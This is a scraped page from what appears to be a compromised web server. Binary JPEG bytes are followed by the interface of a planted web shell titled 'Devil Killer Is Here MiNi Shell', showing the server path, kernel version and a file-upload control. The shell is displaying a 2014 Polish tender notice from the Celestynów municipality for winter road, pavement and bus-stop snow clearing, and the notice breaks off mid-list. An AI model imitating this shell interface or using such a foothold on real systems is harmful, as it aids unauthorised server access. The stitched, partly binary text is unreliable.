JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141008/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141008/333914-N-2014.html

<p class="kh_header"><b>Celestynów: Zimowe utrzymanie dróg gminnych, chodników, zatok autobusowych i placów targowych w granicach administracyjnych Gminy Celestynów</b><br>
<b>Numer ogłoszenia: 333914 - 2014; data zamieszczenia: 08.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Celestynów , ul. Regucka 3, 05-430 Celestynów, woj. mazowieckie, tel. 22 7897060 w. 114, faks 22 7897011.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.celestynow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg gminnych, chodników, zatok autobusowych i placów targowych w granicach administracyjnych Gminy Celestynów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa związana z zimowym utrzymaniem dróg gminnych i chodników w granicach administracyjnych Gminy Celestynów. Zakres zamówienia obejmuje odśnieżanie dróg gminnych i chodników z podziałem na 5 niezależnych, odrębnych części postępowania:
Część 1: Usuwanie skutków opadów śnieżnych w obrębie Ponurzyca, Podbiel, Tabor, Regut, Zabieżki.
		 Ilość km: 24,708 km
		Wykaz ulic: załącznik nr 8
Część 2: Usuwanie skutków opadów śnieżnych w obrębie Celestynów, Lasek.
		Ilość km: 24,587 km
		Wykaz ulic: załącznik nr 9
Część 3: Usuwanie skutków opadów śnieżnych w obrębie Ostrów, Ostrowik, Dyzin, Jatne, Stara Wieś, Dąbrówka, Glina, Pogorzel.
		Ilość km: 31,835 km
		Wykaz ulic: załącznik nr 10
Część 4: Usuwanie skutków opadów śnieżnych na chodnikach o szerokości około 2 m - łączna powierzchnia 23.724,00 m2 oraz przystankach autobusowych - łączna powierzchnia 1.920,00 m2, w tym:
1) Chodniki:
* Celestynów: 
- ul. Jankowskiego po obu stronach drogi (1.042,00 m2),
- ul. Św. Kazimierza (2.690,00 m2),
- ul. Obrońców Pokoju (546,00 m2),
- ul. Kolejowa (1.228,00 m2),
- ul. Wojska Polskiego (2.626,00 m2),
- ul. Regucka (4.542,00 m2),
- ul. Otwocka (1.724,00 m2),
- Place przed Urzędem Gminy (878,00 m2)
* Stara Wieś:
- ul. Dąbrowskiego (112,00 m2),
- ul. Fabryczna w stronę miejscowości Pogorzel (676,00 m2),
- ul. Fabryczna w stronę miejscowości Glina (664,00 m2)
* Glina:
- ul. Marii Dąbrowskiej (2.328,00 m2)
* Dąbrówka:
- ul. Mazowiecka (4.668,00 m2)

2)	Przystanki autobusowe: 
- Ponurzyca, przystanek autobusowy przy szkole,
Ilość przystanków - 1 szt. 
- Regut - ul. Regucka - droga wojewódzka nr 797 w obrębie skrzyżowania drogi wojewódzkiej nr 797 i drogi krajowej nr 50,
Ilość przystanków - 1 szt.
- Podbiel - droga wojewódzka nr 862,
Ilość przystanków - 1 szt.
- Celestynów:
ul. Regucka - droga wojewódzka 797 (przy Ośrodku Zdrowia),
ul. Regucka - droga wojewódzka 797 (przy Szkole Podstawowej),
ul. Św. Kazimierza - droga powiatowa nr 2713W (w rejonie skrzyżowania z drogą wojewódzką nr 797 - ul. Regucka),
ul. Św. Kazimierza - droga powiatowa nr 2713W (w rejonie skrzyżowania z drogą wojewódzką nr 797 - ul. Regucka),
ul. Św. Kazimierza - droga gminna nr 270142W (naprzeciwko pawilonów handlowych),
 	Ilość przystanków - 5 szt.
- Dyzin - droga powiatowa nr 2715W (rejonie skrzyżowania z drogą powiatową nr 2716W),
Ilość przystanków - 1 szt.
- Jatne - droga powiatowa nr 2716W (w rejonie skrzyżowania z drogami gminnymi nr 271638W, 271637W, 271639W),
Ilość przystanków - 1 szt.
- Stara Wieś: 
droga powiatowa nr 2713W - ul. Mazowiecka (w rejonie skrzyżowania z drogą powiatową nr 2722W),
droga powiatowa nr 2713W - ul. Fabryczna (naprzeciwko Szkoły Podstawowej),
       Ilość przystanków - 2 szt.
- Dąbrówka - droga powiatowa nr 2713W (w rejonie ronda),
Ilość przystanków - 1 szt.
- Pogorzel - droga powiatowa nr 2715W (po obu stronach, w rejonie stacji PKP).
Ilość przystanków - 1 szt.
- Ostrowik - przy skrzyżowaniu drogi gminnej Ostrowik - Siwianka z drogą krajową nr 17
Ilość przystanków - 1 szt.
- Ostrów - przy drodze krajowej nr 17
Ilość przystanków - 1 szt.

Część 5: Usuwanie nadmiaru opadów śnieżnych (bieżące wywożenie śniegu wraz z jego zagospodarowaniem) zlokalizowanych na poboczach dróg gminnych, chodników, przystanków autobusowych i placów targowych w miejscach wskazanych przez Zamawiającego.

Wywóz śniegu wyrażony w m3 na podstawie obmiaru samochodu, którym Wykonawca będzie wykonywał ww. usługę. Samochód należy uwzględnić w wykazie potencjału technicznego, który to Wykonawca zgłosi do udziału w postępowaniu przetargowym.
Zagospodarowanie wywiezionego śniegu leży po stronie Wykonawcy.

Część 6: Odśnieżaniem placów targowych na terenie gminy Celestynów, w tym:
1)	Celestynów, przy ul. Św. Kazimierza i ul. Osieckiej - 3.000,00 m2,
2)	Stara Wieś, przy ul. Norwida - 640,00 m2.

2.    W ramach zamówienia Wykonawca zobowiązany będzie do:
2.1.	 zwalczania śliskości zimowej (gołoledzi, lodowicy, śliskości pośniegowej) poprzez  posypywanie nawierzchni jezdni wyznaczonych dróg i ulic materiałem uszorstniającym z 25 % domieszką chlorku sodu lub samych materiałów uszorstniających.  Do posypywania jezdni należy stosować mieszankę w proporcjach zgodnych z Rozporządzeniem Ministra Środowiska z dnia 27 października 2005r. w sprawie rodzajów i warunków stosowania środków, jakie mogą być użyte na drogach publicznych oraz ulicach i placach (Dz. u. Nr 230, poz. 1960),
2.2.	 przygotowywania mieszanki materiałów uszorstniających z 25% domieszką chlorku sodu lub samych materiałów uszorstniających lub równoważnych,
2.3. odśnieżania nawierzchni jezdni, chodników, przystanków autobusowych i placów targowych,
2.4.	 pełnienia dyżuru pogotowia akcji zimowej przez cały okres wykonywania zamówienia,
2.5. prowadzenia szczegółowej ewidencji przebiegu dyżurów i pracy sprzętu wraz z prowadzeniem dziennych raportów prowadzonych akcji oraz  codzienne raportowanie  przedstawicielowi Zamawiającego lub Sołtysowi danego sołectwa o przeprowadzonych działaniach. Każdorazowo w dziennym raporcie znaleźć się powinny m.in.: 
2.5.1.  Ilość zadysponowanego sprzętu
2.5.2.  Czas rozpoczęcia i zakończenia dyżuru
2.5.3.  Czas rozpoczęcia i zakończenia wszelkich działań podjętych w czasie dyżuru,
2.5.4.  Ilość zużytych materiałów oraz zakres wykonanych prac.
2.6. świadczenia usług objętych przedmiotem zamówienia zgodnie ze standardem zimowego utrzymania dróg - załącznik  nr 11 do SIWZ
2.7.	 usuwania nadmiaru opadów śnieżnych (bieżące wywożenie śniegu) zlokalizowanych na poboczach dróg gminnych, chodników, przystanków autobusowych i placów targowych w miejscach wskazanych przez Zamawiającego. 2.8. odśnieżania dwóch placów targowych na terenie gminy Celestynów, zlokalizowanych: 1 plac targowy w Celestynowie; 1 plac targowy w Starej Wsi.
3.  Wykonawca ma obowiązek przystąpić do realizacji przedmiotu zamówienia zgodnie z poniższymi zasadami:
3.1. Wykonawca przystąpi do usuwania skutków opadu śniegu (dotyczy dróg, chodników, przystanków autobusowych i targowisk): - w ciągu 1 godziny od telefonicznego wezwania przez koordynatora Zamawiającego, - bez wezwania koordynatora Zamawiającego, po ustaniu opadów lub w trakcie opadu, gdy Wykonawca stwierdzi, że pokrywa śniegu osiągnie 10 cm grubości,
3.2. Wykonawca przystąpi do zwalczania śliskości zimowej (dotyczy dróg, chodników, przystanków autobusowych i targowisk): - w ciągu 1 godziny od telefonicznego wezwania przez koordynatora Zamawiającego, - bez wezwania koordynatora Zamawiającego, w przypadku raptownej odwilży lub opadów marznącego deszczu osadzającego lód na drodze, chodnikach i przystankach autobusowych gdy Wykonawca stwierdzi wystąpienie śliskości nawierzchni dróg, chodników lub przystanków autobusowych,
3.3. Wykonawca przystąpi do usuwania skutków opadu śniegu (dotyczy odśnieżania placów targowych): - w ciągu 1 godziny od telefonicznego wezwania przez koordynatora Zamawiającego, - bez wezwania koordynatora Zamawiającego, po ustaniu opadów lub w trakcie opadu, gdy Wykonawca stwierdzi, że pokrywa śniegu osiągnie 20 cm grubości.
4.  Wykonawca będzie odpowiadać za wszelkie spowodowane przez jego działania uszkodzenia, a szkody wyrządzone podczas realizacji przedmiotu zamówienia Wykonawca zobowiązany jest naprawić niezwłocznie na własny koszt. Wykonawca podejmie odpowiednie środki w celu zabezpieczenia dróg gminnych, chodników, przystanków autobusowych lub innych urządzeń drogowych oraz terenów prywatnych przed zniszczeniami spowodowanymi środkami transportu lub maszynami Wykonawcy.  Za wszelkie szkody z tym związane ponosi odpowiedzialność Wykonawca.
5.	Wykonawca zapewni maszyny i urządzenia oraz materiały niezbędne do realizacji zamówienia oraz utrzyma w dyspozycyjności przygotowany dla Zamawiającego sprzęt i obsługę przez cały okres trwania umowy.
6.	W okresie obowiązywania umowy Wykonawca zobowiązany jest do stałego uzupełniania ubytków w wyposażeniu i obsłudze kadrowej do ilości niezbędnej dla realizacji zamówienia.
7.	Odbiór usług zimowego utrzymania dróg dokonywany będzie na podstawie dziennych raportów. Potwierdzenia wykonania przedmiotu zamówienia dokonywać będzie każdorazowo, w dziennych raportach Sołtys danego sołectwa lub upoważniona do tego osoba wyznaczona przez Zamawiającego.
8.	Sołtys lub przedstawiciel Zamawiającego dokonywać będzie bieżącej kontroli wykonywanych usług poprzez  zatwierdzenie  dobowych raportów stanowiących każdorazowo załącznik do faktury zgodnie z  Załącznikiem nr: 12, 13, 14, 15 do SIWZ. 
9.	Wykonawca zobowiązany jest każdorazowo, na wniosek Zamawiającego do delegowania przedstawiciela celem wzięcia udziału w kontroli usług. Zamawiający będzie dokonywać odbiorów i kontroli usług  według następujących zasad:
9.1. Wykonawca sporządza dobowy raport  usług według wzoru stanowiącego załącznik nr 12, 13, 14, 15 do SIWZ po każdorazowym wykonaniu usług, które potwierdzają Sołtysi lub koordynator wskazany przez Zamawiającego.
10. Wykonawca będzie prowadził zimowe utrzymanie dróg i ulic w granicach administracyjnych Gminy Celestynów (zgodnie z wykazem ulic stanowiącym załącznik nr 8, 9, 10) wg  standardu zimowego utrzymania - załącznik nr 11.
11. Wykonawca zapewni bazę przez okres wykonywania przedmiotu umowy w celu składowania materiałów uszorstniających oraz parkowania sprzętu niezbędnego do wykonania zamówienia.
12. W trakcie wykonywania przedmiotu zamówienia Wykonawca zobowiązany jest posiadać całodobowe stanowisko dyspozytorskie z łącznością telefoniczną..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 20 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia, o których mowa w art. 67 ust.1 pkt. 6 ustawy Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda składana oferta musi być zabezpieczona wadium w wysokości: dla 1 części postępowania 2.000,00 zł (słownie:  dwa tysiące złotych); dla 2 części postępowania 2.000,00 zł (słownie:  dwa tysiące złotych); dla 3 części postępowania 3.000,00 zł (słownie: trzy tysiące złotych); dla 4 części postępowania 3.500,00 zł (słownie: trzy tysiące pięćset złotych); dla 5 części postępowania Zamawiający nie wymaga wniesienia wadium;
dla 6 części postępowania Zamawiający nie wymaga wniesienia wadium; ważnym w okresie związania ofertą. 2. Forma wadium. Wadium może być wniesione w następujących formach: 1) pieniądzu, 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, 3) gwarancjach bankowych, 4) gwarancjach ubezpieczeniowych, 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2007 r. Nr 42, poz. 275 z późn. zm.). 3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego: 23 8001 0005 2002 0008 6091 0012, prowadzone przez: Bank Spółdzielczy w Otwocku oddział w Celestynowie, z następującą adnotacją Zimowe utrzymanie dróg gminnych, chodników, zatok autobusowych i placów targowych w granicach administracyjnych Gminy Celestynów              część postępowania. 4.Wadium wnoszone w innej formie niż pieniężna Wykonawca złoży w Celestynowie przy ul. Reguckiej 3, Biurze Obsługi Mieszkańca - Urzędu Gminy w Celestynowie lub dołączy do oferty. 5. Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy na rachunku Zamawiającego zostanie zaksięgowane wadium przed upływem terminu składania ofert. 6. Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 Pzp tj. 1) Wszystkim Wykonawcom - niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana, jako najkorzystniejsza z zastrzeżeniem art. 46 ust. 4 a Pzp. 2) Wykonawcy, którego oferta została wybrana, jako najkorzystniejsza - niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy. 3) Na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert - niezwłocznie. 7. Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 Pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana, jako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez Zamawiającego. 8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: a) Odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, 9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Pzp, lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie załączenia do oferty oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z wzorem przedstawionym w Załączniku Nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku udziału w postępowaniu nastąpi na podstawie wykazania, że Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał:
dla 1 części postępowania - co najmniej dwie (2) usługi polegające na  zimowym utrzymania dróg o wartości minimum 15.000,00 zł brutto każda;
dla 2 części postępowania - co najmniej dwie (2) usługi polegające na zimowym utrzymania dróg o wartości minimum 15.000,00 zł brutto każda;
dla 3 części postępowania - co najmniej dwie (2) usługi polegające na zimowym utrzymania dróg o wartości minimum 15.000,00 zł brutto każda;
dla 4 części postępowania - co najmniej dwie (2) usługi polegające na  zimowym utrzymania chodników o wartości minimum 10.000,00 zł brutto każda;
dla  5  część postępowania - Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie załączenia do oferty oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z wzorem przedstawionym w Załączniku Nr 3 do SIWZ;
dla  6  część postępowania - Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie załączenia do oferty oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z wzorem przedstawionym w Załączniku Nr 3 do SIWZ;
wraz z podaniem ich rodzaju i wartości, dat i miejsca wykonania oraz załączeniem dowodów określających czy usługi te zostały wykonane w sposób należyty (np. referencje, protokoły)
W celu potwierdzenia spełniania powyższego warunku Wykonawca zobowiązany jest przedłożyć wykaz wykonanych usług sporządzony według wzoru stanowiącego Załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania narzędziami, wyposażeniem zakładu i urządzeń technicznych dostępnych wykonawcy usługi w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami tj. w tym w szczególności dla każdej z części zamówienia wykonawca zapewni osobno: 
dla 1 części postępowania:
- samochód z pługiem - min. 1 sztuka,
- ciągnik mechaniczny z pługiem -  min. 1 sztuka,
- solarka - min. 1 sztuka.
dla 2 części postępowania:
- samochód z pługiem - min. 1 sztuka,
- ciągnik mechaniczny z pługiem - min. 1 sztuka,
- solarka - min. 1 sztuka.
dla 3 części postępowania:
- samochód z pługiem - min. 1 sztuka
- ciągnik mechaniczny z pługiem - min. 1 sztuka,
- solarka - min. 1 sztuka.
dla 4 części postępowania:
- quad z pługiem - min.  1 sztuka lub miniładowarka na kołach gumowych  -  min. 1 szt. 
dla 5 części  postępowania:
- koparko - ładowarka - min. 1 szt.
- samochód samowyładowczy - min. 1 szt.	
dla 6 części  postępowania:
- quad z pługiem - min.  1 sztuka lub miniładowarka na kołach gumowych  -  min. 1 szt. lub traktor z pługiem - min. 1 szt.
W celu potwierdzenia spełniania powyższego warunku Wykonawca zobowiązany jest przedłożyć wykaz sporządzony według wzoru stanowiącego Załącznik nr 6 do SIWZ. Wykaz winien zawierać szczegółowe informacje na temat narzędzi i urządzeń technicznych, którymi dysponuje Wykonawca, wraz ze wskazaniem podstawy dysponowania tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie załączenia do oferty oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z wzorem przedstawionym w Załączniku Nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie przedstawienia opłaconej polisy lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. Polisa lub inny dokument świadczący o posiadaniu przez Wykonawcę ubezpieczenia powinny być ważne w dniu składania ofert</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

